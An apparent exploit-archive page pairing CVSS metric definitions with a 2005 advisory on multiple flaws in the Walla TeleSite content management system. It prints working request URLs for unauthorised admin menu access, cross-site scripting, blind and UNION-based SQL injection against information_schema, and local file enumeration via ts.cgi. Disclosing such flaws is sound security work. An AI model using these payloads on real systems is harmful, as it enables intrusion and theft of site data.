The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Walla TeleSite
Vendors: http://www.walla.co.il
Versions: 3.0 and perior
Platforms: Windows (ISAPI, a few vulnerabilities apply Linux too)
Bug: Multiple Vulnerabilities
Exploitation: Remote with browser
Date: 13 Nov 2005
Author: Rafi Nahum, Pokerface
e-mail: [email protected]
web: Not Yet....but soon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Walla TeleSite is a Website Content Managment CGI web application.
It is very common amoung big israeli websites. It also used as a wrapper to
all the website links. It is also used by Walla.co.il and the Walla.com
Network.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
The TeleSite wraps the website with templates and ids to all the links.
The main navigation page ts.exe receives a parameter called 'tsurl' and it
does
not verifies/limits the numbers it receives, for example it should receive
0.22.1.0
if there is such a page, but it shouldn't 0.1.0.0 because it leads to the
private articles
menu of administrator.
In addition, further input filtering is missing in the webpages
Get/Post/Cookie parameters, this is a "feature" missing to this software
which causes
the web programmers using this website content managment engine to think
their parameters
are filtered, well they are'nt and this causes all their clients to have
Script and SQL Injections.
Where it is obvious that an SQL Injection may lead to complete remote
compromise if the
website and XSS to content spoofing, phishing, cookie stealing, D.O.S
attacks and more.
The TeleSite application also does not saves the errors to itself...in an
error.log or something
similar, it informs the attacker with the local path of the files it could
not open/access when
the attacker tempares with the website parameters. A remote attacker can
also enumerate
all the files on the machine by supplying their full path to ts.cgi after
the querystring.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Articles Menu Access:
--------------------------------
http://host/ts.exe?tsurl=0.1.0.0
Cross Site Scripting - XSS:
--------------------------------------
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr
ipt>alert()</script>
Blind SQL Injection:
-----------------------------
Proof Of Concept:
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='1
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='2
Exploitation:
http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
y','poo','polo','nike'%20from%20information_schema.columns--
Local Path Disclosure:
-------------------------------
D:\TeleSite\online\templates\\example\sections\header
Local File Enumeration:
---------------------------------
http://host/ts.cgi?c:\boot.ini
http://host/ts.cgi?c:\boot1.ini
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Rafi Nahum, Pokerface
Greetings to The-Insider
"Pokerface is the name, reputation follows."
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum